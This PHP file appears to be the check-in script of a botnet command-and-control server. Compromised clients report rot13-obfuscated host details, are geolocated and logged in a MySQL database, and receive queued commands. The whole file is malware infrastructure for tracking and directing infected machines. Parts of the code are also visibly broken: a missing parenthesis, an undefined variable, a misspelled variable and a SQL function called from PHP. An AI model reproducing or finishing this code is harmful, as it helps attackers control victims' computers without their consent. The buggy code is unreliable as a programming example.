<?PHP // file: info.php include("geoip.inc"); // for the geoip function f

1. <?PHP
2.     // file: info.php
3.    
4.     include("geoip.inc"); // for the geoip function
5.    
6.     function isRowEmpty($row)
7.     {
8.         foreach($row as $a)
9.         {
10.             if(!empty($a))
11.             {
12.             return false;
13.             }
14.         }
15.         return true;
16.     }
17.  
18.     function sanitize($data)
19.     {
20.         // remove whitespaces (not a must though)
21.         $data = trim($data);
22.  
23.         // apply stripslashes if magic_quotes_gpc is enabled
24.         if(get_magic_quotes_gpc())
25.         {
26.             $data = stripslashes($data);
27.         }
28.  
29.         // a mySQL connection is required before using this function
30.         $data = mysql_real_escape_string($data);
31.  
32.         return $data;
33.     }
34.    
35.     // database connection information
36.     $database = "database_name";
37.     $user = "user_name";
38.     $password = "Pa$$worD";
39.     $host = "localhost";
40.  
41.     // connect to the database
42.     $mysql = mysql_connect( $host, $user, $password );
43.     mysql_select_db( $database );
44.    
45.     /*
46.  
47.     $sql = "CREATE TABLE IF NOT EXISTS `clients` (
48.     `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
49.     `registered_time` TIMESTAMP NOT NULL,
50.     `serial` varchar(25) NOT NULL,
51.     `comp_name` varchar(128) NOT NULL,
52.     `os` varchar(5) NOT NULL,
53.     `delay` bigint(20) NOT NULL,
54.     `report_time` TIMESTAMP NOT NULL,
55.     `lastorder_id` bigint(10),
56.     `uptime` varchar(128) NOT NULL,
57.     `online_uptime` tinyint(3) DEFAULT 0,
58.     `ip` varchar(15) NOT NULL,
59.     `country_code` varchar(5) NOT NULL,
60.     `country_name` varchar(20) NOT NULL,
61.     `version` varchar(10) NOT NULL
62.     ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1";
63.     $result = mysql_query( $sql );
64.  
65.     $sql = "CREATE TABLE IF NOT EXISTS `global_orders` (
66.     `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
67.     `order` varchar(128),
68.     `order_time` TIMESTAMP NOT NULL,
69.     `exp_date` DATE NOT NULL
70.     ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1";
71.     $result = mysql_query( $sql );
72.  
73.     $sql = "CREATE TABLE IF NOT EXISTS `orders` (
74.     `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
75.     `clientid` bigint(20) unsigned NOT NULL,
76.     `order` varchar(128),
77.     `order_time` TIMESTAMP NOT NULL
78.     ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1";
79.     $result = mysql_query( $sql );
80.  
81.     */
82.     // decrypted buffer in this format h6Yht56RfT:UncleBoB-PC:WIN7:50000:m1.0:7653332:22
83.     //                                  $serial:$comp_name:$os:$delay:$version:$uptime:$lastorder_id
84.    
85.     $buffer_crypted = sanitize($_GET['sid']);
86.     $buffer_clear = str_rot13($buffer_crypted);
87.     $serial = strtok($buffer_clear, ":");
88.     $comp_name = strtok(":");
89.     $os = strtok(":");
90.     $delay = strtok(":");
91.     $version = strtok(":");
92.     $uptime = strtok(":");
93.     $lastorder_id = strtok(":");
94.     $ip = getenv("REMOTE_ADDR");
95.    
96.     // sanitize ints
97.     $delay = intval($delay);
98.     $uptime = intval($uptime);
99.     $lastorder_id = intval($lastorder_id);
100.  
101.     // format uptime
102.     $minsuptime = $uptime % 60;
103.     if ( $minsuptime > 1 ) $minsuptime = $minsuptime." Minutes";
104.     else $minsuptime = $minsuptime." Minute";
105.    
106.     $hoursuptime = $uptime / 60 % 24;
107.     if ( $hoursuptime > 1 ) $hoursuptime = $hoursuptime." Hours";
108.     else $hoursuptime = $hoursuptime." Hour";
109.    
110.     $daysuptime = $uptime / 60 / 24 % 7;
111.     if ( $daysuptime > 1 ) $daysuptime = $daysuptime." Days";
112.     else $daysuptime = $daysuptime." Day";
113.    
114.     $weeksuptime = $uptime / 60 / 24 / 7 % 52;
115.     if ( $daysuptime > 1 ) $weeksuptime = $weeksuptime." Weeks";
116.     else $weeksuptime = $weeksuptime." Week";
117.    
118.     $uptimeformated = $weeksuptime.", ".$daysuptime.", ".$hoursuptime.", ".$minsuptime;
119.  
120.     // geolocate IP
121.     $gi = geoip_open("GeoIP.dat",GEOIP_STANDARD);
122.     $country_code = geoip_country_code_by_addr($gi, $ip);
123.     $country_name = geoip_country_name_by_addr($gi, $ip);
124.     geoip_close($gi);
125.  
126.     if( $serial != NULL ) // // populate SQL clients table
127.     {
128.         $sql = "SELECT * FROM clients WHERE serial LIKE '$serial'";
129.         $result = mysql_query( $sql );
130.         if( mysql_num_rows( $result ) ) // checks if 'clients' table has a row with the matching id
131.         {
132.             // calculate the online_uptime %
133.            
134.             /*
135.             1st connect ( time = a ) // bot has been online for 0
136.             registered_time = a
137.             report_time = a
138.             online_uptime = 0
139.  
140.             2nd connect ( time = b ) // bot has been online for ( b - a )
141.             registered_time = a
142.             report_time = b
143.             online_uptime = previous online_uptime(0) + (b - a)
144.  
145.             3rd connect ( time = c ) // bot has been online for ( (b - a) + ( c - b )
146.             registered_time = a
147.             new report_time = c
148.             online_uptime = previous online_uptime(b-a) + ( new report_time(c) - previous report_time(b) )
149.             */
150.            
151.             $row = mysql_fetch_assoc( $result );
152.             $cumulative_uptime = $row['online_uptime'] + $report_time - $row['report_time']; // cumulative client uptime
153.             $sql = "SELECT create_time FROM INFORMATION_SCHEMA.TABLES WHERE table_name = 'clients'";
154.             $result = mysql_query( $sql );
155.             $row = mysql_fetch_row( $result ); // stores 'clients' table creation time
156.             $table_uptime = time() - strtotime($row[0]); // total uptime
157.            
158.             $online_uptime = ( 1 - ( ( $table_uptime - $cummulative_uptime ) / $table_uptime ) ) * 100; // uptime in %
159.            
160.             // uptate client information
161.             $sql = "UPDATE clients SET report_time=NULL, version='$version', online_uptime='$online_uptime', uptime='$uptimeformated', delay='$delay', ip='$ip', country_code='$country_code', country_name='$country_name', lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
162.             $result = mysql_query( $sql );
163.            
164.             // get the id of the client
165.             $sql = "SELECT * FROM clients WHERE serial LIKE '$serial'";
166.             $result = mysql_query( $sql );
167.             $row = mysql_fetch_assoc( $result );
168.             $clientid = $row['id'];
169.  
170.             // checks the orders table to see if there is a specific order for this client
171.             $sql = "SELECT * FROM orders WHERE clientid LIKE '$clientid'";
172.             $result = mysql_query( $sql );
173.             $row = mysql_fetch_assoc( $result ); // stores the row that contains the order information for that specific client
174.            
175.             if (!isRowEmpty($row) // if there is a specific bot command prints it out
176.             {
177.                 // echo the command to the client and clear it from the orders table
178.                 echo ">".str_rot13($row['order'])."<\n";
179.                 $id = $row['id'];
180.                 $sql = "DELETE FROM orders WHERE id LIKE '$id'";
181.                 mysql_query( $sql );
182.             }
183.             else // grabs the next command it hasn't done in the global_orders table
184.             {
185.                 // if lastorder_id = 0 then same but no where stuff, just to get the first row of the table
186.                 if ($lastorder_id == 0)
187.                 {
188.                     $sql = "SELECT * FROM global_orders";
189.                     $result = mysql_query( $sql );
190.                     $row = mysql_fetch_assoc( $result ); // stores the first row in global_orders
191.                    
192.                     if ( CURDATE() < $row['exp_date'] ) // check if the command is old or not
193.                     {
194.                         echo ">".str_rot13($row['order'])."<\n"; // echo the command to the client
195.                         $sql = "UPDATE clients SET lastorder_id='$row['id']' WHERE serial LIKE '$serial'"; 
196.                     }  
197.                 }
198.                 else
199.                 {
200.                     // check if the command is old or not to implement
201.                     $sql = "SELECT * FROM global_orders WHERE id LIKE '$lastorder_id + 1'";
202.                     $result = mysql_query( $sql );
203.                     $row = mysql_fetch_assoc( $result ); // stores the row that contains the order information
204.                    
205.                     if ( CURDATE() < $row['exp_date'] ) // check if the command is old or not
206.                     {
207.                         echo ">".str_rot13($row['order'])."<\n"; // echo the command to the client
208.                         $sql = "UPDATE clients SET lastorder_id='$row['id']' WHERE serial LIKE '$serial'";
209.                     }  
210.                 }
211.             }
212.         }
213.         else
214.         {
215.             // else insert info into the clients table
216.             $sql = "INSERT INTO clients ( comp_name, serial, os, ip, country_code, country_name, delay, version, uptime, lastorder_id ) VALUES ( '$comp_name ', '$serial', '$os', '$ip', '$country_code', '$country_name', '$delay', '$version', '$uptimeformated', '$lastorder_id' )";
217.             if( mysql_query( $sql ) )
218.                 echo ">ADDED<\n"; // allows the client to know it was succesfully added if needed
219.         }
220.     }      
221. ?>